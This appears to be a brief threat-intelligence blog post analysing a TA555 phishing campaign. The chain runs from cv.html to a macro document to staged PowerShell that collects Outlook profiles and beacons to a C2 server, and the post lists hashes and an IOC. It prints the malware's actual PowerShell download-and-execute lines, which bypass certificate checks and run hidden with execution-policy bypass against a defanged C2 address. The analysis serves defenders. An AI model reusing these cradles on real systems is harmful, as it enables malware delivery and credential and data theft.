Found the new TA555 campaign spreads via email campaign, As analysed the file , I found lots of code similarities and behaviours which referred here hxxps://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot.
I am still doing my analysis, this will be a quick note for the defenders to fix their part.
Hash:
MD5: a2d689af80054f2e81c297afd5f933b6
Filename: cv.html
Execution Flow:
cv.html -> drops embedded cvxxx.doc
-> Macro runs PowerShell
-> PowerShell waits for 284 seconds and downloads additional PowerShell script via PNG extension.
powershell.exe -nop Start-Sleep 284;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex (New-Object System.Net.WebClient).DownloadString('hxxps://194.36[.]188[.]132/'+(-join ((97..122) | Get-Random -Count 7 | % {[char]$_}))+'.png')
xxxxxx.PNG -> Second PS script
Downloads another PowerShell script via JPG extension.
$P59N3q7L5="-w 1 -sta -nop -noexit -ep bypass -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={`$true};iex (New-Object System.Net.WebClient).DownloadString('hxxps://194.36[.]188[.]132/'+(-join ((97..122) | Get-Random -Count 9 | % {[char]`$_}))+'.jpg')";if($env:PROCESSOR_ARCHITEW6432 -eq "AMD64"){$cEaleMo="$env:WINDIR\sysnative";}else{$cEaleMo="$env:WINDIR\system32";};$cEaleMo+="\windowspowershell\v1.0\powershell.exe";Start-Process $cEaleMo -arg $P59N3q7L5 -windowstyle hidden;
xxxxxx.JPG -> Third PS script
Has two b64 encoded data.
2nd decoded data – PowerShell script which do system discovery and collects Microsoft Outlook profile details and sends to C2, in parallel it also checks which Antivirus product installed.
During the analysis, I haven’t found any final payload drops, The PowerShell script is actively beaconing to C2.
But I found some remnants in code that it drops a payload *.exe in TEMP folder.
Metadata:
IOC - 194.36[.]188[.]132:443
Main file – cv.html: a2d689af80054f2e81c297afd5f933b6
CVxxxx.doc: EAF039445CC11684AA41652CF5BAE53D
xxxxx.PNG: A0F6A71FA67F77D04F2B59243DB9B33C (PS script)
XXXX.JPG: 995B8930FF2650EFE4D4E8204E644601(PS script)
Tools.dll: A034C5DBB4442894E2808FF008265620
Cheers!
0 comments:
Post a Comment